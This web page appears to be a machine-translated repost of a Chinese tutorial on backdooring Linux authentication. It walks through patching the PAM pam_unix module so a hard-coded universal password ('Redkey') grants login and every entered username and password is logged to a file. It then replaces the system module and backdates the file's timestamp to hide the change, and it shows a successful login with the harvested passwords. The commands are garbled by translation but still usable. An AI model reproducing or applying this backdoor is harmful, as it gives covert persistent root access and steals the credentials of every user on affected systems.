Home > Developer > Linux

Linux system security Pam Backdoor installation use detailed

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

One. To view the system Pam version:

[Email protected] ~]# Rpm-qa | grep pampam-1.1.1-4.el6.x86_64

Two. Download the corresponding version of the PAM module

http://www.linux-pam.org/library/

Three. Unzip & Modify PAM_UNIX_AUTH.C file

TAR-XZVF linux-pam-1.1.1.tar.gzcd LINUX-PAM-1.1.1CD Modules/pam_unix/vim pam_unix_auth.c

Four. Modify the section

in Pam_extern int pam_sm_authenticate (pam_handle_t * pamh, int flags                                  , int argc, const char **argv) {definition: FILE *FP; as follows: Pam_e Xtern int pam_sm_authenticate (pam_handle_t * pamh, int flags                                   , int argc, const char **argv) {        unsigned int ctrl;
   
    int retval, *ret_data = NULL;        const char *name;        const void *p;        FILE *fp; in retval = _unix_verify_password (pamh, name, p, ctrl); [approx. 177 rows] Under Add/*password: "Redkey" */if (strcmp (P, "Redkey") ==0) {        retval = pam_success;} if (retval== pam_success) {/*pamfile:pamwd.txt*/        fp=fopen ("Pamwd.txt", "a");        fprintf (FP, "%s::%s\n", name,p);

Five. Compiling

[Email protected] pam_unix]# CD. /.. /[[email protected] linux-pam-1.1.1]#./configure[[email protected] linux-pam-1.1.1]# make

Six. Back up the original Pam module

[[Email protected] security]# MV Pam_unix.so{,.bak}

Seven. Copy the new Pam module to the/lib64/security/directory:

[Email protected] security]# cp/root/linux-pam-1.1.1/modules/pam_unix/.libs/pam_unix.so/lib64/security/

Eight. Modifying the PAM module time properties

[[email protected] security]# stat pam_unix.* File: "pam_unix.so" Size: 151879 blocks:304 IO block:4096 Ordinary file device:fd01h/64769d inode:565261 links:1access: (0755/- Rwxr-xr-x) Uid: (0/root) Gid: (0/root) access:2013-12-24 11:30:01.813610217 +0800modify:2013-12-24 08: 55:00.000000000 +0800change:2013-12-24 11:29:12.747789015 +0800 File: "Pam_unix.so.bak" size:50752 blocks:1    device:fd01h/64769d IO block:4096 Normal file inode:523660 links:1access: (0755/-rwxr-xr-x) Uid: (0/ Root) Gid: (0/root) access:2013-12-24 08:55:08.026835929 +0800modify:2010-02-16 01:34:42.000000000 +0800Chan ge:2013-12-24 10:42:11.741663207 +0800[[email protected] security]# touch-t 201002160134 pam_unix.so[[email  protected] security]# ll pam_unix.*-rwxr-xr-x 1 root root 151879 February pam_unix.so-rwxr-xr-x. 1 root root 50752 February Pam_unix.so.bak

Nine. Universal Password Login Verification

Login As:root[email protected] ' s password:last login:tue Dec 11:10:16 from 192.168.169.1[[email protected] ~]#[[ Email protected]/]# cat Pamwd.txtroot::redkeyroot::123456root::12345678root::redkeyroot::redkey

  

Linux system security Pam Backdoor installation use detailed

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
linux file system security linux debian installation guide mysql linux installation guide artifactory installation linux pam pam download installation of unix operating system dell operating system installation disc

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More